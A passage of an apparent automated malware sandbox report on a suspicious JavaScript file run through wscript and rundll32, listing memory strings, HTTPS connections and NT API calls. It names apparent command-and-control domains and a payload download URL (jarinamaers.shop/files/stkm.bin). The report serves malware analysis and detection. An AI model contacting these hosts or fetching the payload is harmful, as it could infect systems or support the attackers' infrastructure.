Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://tl.symcd.com0&
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.cH
Source: rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000006.00000003.2994803348.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/E0#W
Source: rundll32.exe, 00000006.00000003.5750316850.000001800FF2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/H
Source: rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/Li
Source: rundll32.exe, 00000006.00000003.2994803348.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/es
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787731986.000001800FF11000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6962568501.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000006.00000003.4787731986.000001800FF11000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/S
Source: rundll32.exe, 00000006.00000003.2983176378.0000018010110000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/hy
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/l
Source: rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/rW
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/ras.com/live/
Source: rundll32.exe, 00000006.00000003.5750316850.000001800FF29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/w
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903428713.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2790535697.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/?
Source: rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/files/stkm.bin
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/(y
Source: rundll32.exe, 00000006.00000003.2903428713.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/J$=W
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/OIDV6SW/
Source: rundll32.exe, 00000006.00000003.2903527062.000001800DF8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/P
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/dll
Source: rundll32.exe, 00000006.00000003.2790535697.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2903428713.000001800DFC9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2749690995.000001800DFD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/l
Source: rundll32.exe, 00000006.00000003.2749690995.000001800E002000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2790535697.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/s6
Source: rundll32.exe, 00000006.00000003.7220266722.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7177265996.000001800FF4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.c
Source: rundll32.exe, 00000006.00000003.7220266722.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7177265996.000001800FF4C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4788197767.000001800DFFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7263170002.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/
Source: rundll32.exe, 00000006.00000003.7266051394.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.7263170002.000001800FF4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/(h)W$
Source: rundll32.exe, 00000006.00000003.5965951373.000001800FF41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/4g9V
Source: rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/=0
Source: rundll32.exe, 00000006.00000003.6962520365.000001800FF45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/Pb
Source: rundll32.exe, 00000006.00000003.6264187560.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/d
Source: rundll32.exe, 00000006.00000003.2983176378.0000018010110000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3042728036.0000018010070000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5112685854.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5241324561.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4830897294.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5491239719.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5750950805.000001800E003000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.5326914182.000001800E004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6521086402.000001800FF27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.6307126333.000001800FF28000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4787698793.000001800E002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/My
Source: rundll32.exe, 00000006.00000003.6520846263.000001800E003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/ll
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: https://www.advancedinstaller.com
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000002.1723997016.0000023BEC072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1721591141.0000023BEC071000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repo
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: MSI181.tmp.1.dr, MSIA3.tmp.1.dr, MSIC4.tmp.1.dr, MSI54.tmp.1.dr, MSI103.tmp.1.dr, MSIFFD6.tmp.1.dr, MSI846B.tmp.1.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.10:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.34:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

System Summary

Source: Document_a51_19i793302-14b09981a5569-3684u8.js Static file information: Suspicious name
Source: C:\Windows\System32\rundll32.exe Process Stats: CPU usage > 49%
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEB0C4 NtOpenKey,RtlpNtOpenKey, 5_2_00000235B5CEB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 5_2_00000235B5CEB1D4
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CEAD34 NtAllocateVirtualMemory, 5_2_00000235B5CEAD34
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE78C0 NtReadFile, 5_2_00000235B5CE78C0
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE77B0 RtlInitUnicodeString,NtCreateFile, 5_2_00000235B5CE77B0
